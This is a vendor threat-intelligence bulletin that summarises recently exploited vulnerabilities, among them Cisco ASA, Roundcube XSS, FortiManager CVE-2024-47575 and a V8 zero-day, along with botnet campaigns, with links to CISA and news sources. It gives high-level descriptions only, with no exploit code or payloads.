This week, the CISA Known Exploited Vulnerabilities (KEV) catalog saw an expansion with the addition of five newly identified vulnerabilities impacting products from Cisco, Roundcube WebMail, ScienceLogic SL1 platform, Microsoft, and Fortinet.

The UNC5820 threat group is exploiting a cross-site scripting vulnerability in Fortinet's FortiManager, drawing attention to significant security risks. Simultaneously, Google has alerted users about vulnerabilities in Samsung mobile processors that are actively being exploited. Furthermore, the notorious Lazarus Group from North Korea has been attributed in exploiting a recently patched zero-day vulnerability in Google software. 

Additionally, there has been a marked increase in the activity of the Mirai botnet, which has intensified its attacks on TP-Link Archer AX21 routers, highlighting its ongoing targeting of consumer devices. The Sysrv and Enemy botnets have also been exploiting vulnerabilities in Spring Cloud Gateway, broadening their attack vectors. Meanwhile, the IoT_Reaper botnet continues to target a persistent vulnerability in MVPower CCTV DVR models, and Zerobot has been found exploiting a three-year-old vulnerability in the Apache HTTP server.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions. 

CVE-2024-20481 

A vulnerability in the Remote Access VPN (RAVPN) service of Cisco ASA and Firepower Threat Defense (FTD) Software could let unauthenticated attackers launch a denial-of-service (DoS) attack. Added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, this zero-day flaw was exploited in a brute force password spraying attack in April before Cisco released a patch. 

CVE-2024-37383

A stored cross-site scripting (XSS) vulnerability in Roundcube Webmail, tracked as CVE-2024-37383, was exploited in a phishing campaign targeting government organizations in June 2024. Threat actors used seemingly empty emails containing hidden JavaScript payloads to steal credentials from Roundcube users. This vulnerability has also been added to the CISA Known Exploited Vulnerabilities (KEV) catalog recently.

CVE-2024-9537

A critical remote code execution (RCE) vulnerability with a CVSS score of 9.8 has been identified in the ScienceLogic SL1 platform, potentially allowing unauthorized access to its internal performance reporting systems. Rackspace confirmed to Bleeping Computer that this flaw was actively exploited as a zero-day by unknown threat actors. In response to the heightened risk, this vulnerability has also been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.

CVE-2024-38094 

A new vulnerability, CVE-2024-38094, with a CVSS score of 7.2, has been identified in Microsoft SharePoint Server and was recently added to the CISA Known Exploited Vulnerabilities (KEV) catalog. According to Microsoft, an authenticated attacker with Site Owner permissions can exploit this deserialization vulnerability to inject and execute arbitrary code within the SharePoint environment.

CVE-2024-44068

Google's Threat Analysis Group (TAG) has flagged a critical zero-day vulnerability, CVE-2024-44068, affecting Samsung's mobile processors—specifically Exynos 9820, 9825, 980, 990, 850, and W920. The flaw, which has a CVSS score of 8.1, is being exploited in the wild as part of an attack chain enabling arbitrary code execution. Samsung addressed the issue with security patches released in their October 2024 updates.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned. As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.   

CVE-2024-47575

A critical missing authentication vulnerability has been discovered in the Fortinet FortiManager fgfmd daemon, which enables remote unauthenticated attackers to execute arbitrary code or commands via specially crafted requests. Investigations by Mandiant revealed the existence of a new threat cluster, designated UNC5820, that has been actively exploiting this vulnerability since June 27, 2024. Additionally, this flaw has recently been included in CISA's Known Exploited Vulnerabilities (KEV) catalog. 

CVE-2024-4947

A Type Confusion vulnerability in the V8 JavaScript engine has been discovered, potentially enabling remote code execution attacks. Kaspersky has identified the Lazarus Group, a North Korean cyber threat actor, as responsible for exploiting this zero-day vulnerability. The vulnerability, which has now been patched, allowed attackers to gain unauthorized access and control over compromised systems.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

• https://www.cisa.gov/news-events/alerts/2024/10/24/cisa-adds-two-known-exploited-vulnerabilities-catalog 
• https://www.cisa.gov/news-events/alerts/2024/10/21/cisa-adds-one-known-exploited-vulnerability-catalog 
• https://www.cisa.gov/news-events/alerts/2024/10/22/cisa-adds-one-known-exploited-vulnerability-catalog 
• https://www.bleepingcomputer.com/news/security/rackspace-monitoring-data-stolen-in-sciencelogic-zero-day-attack/ 
• https://www.darkreading.com/endpoint-security/samsung-zero-day-vuln-under-active-exploit-google-warns 
• https://www.cisa.gov/news-events/alerts/2024/10/23/cisa-adds-one-known-exploited-vulnerability-catalog 
• https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575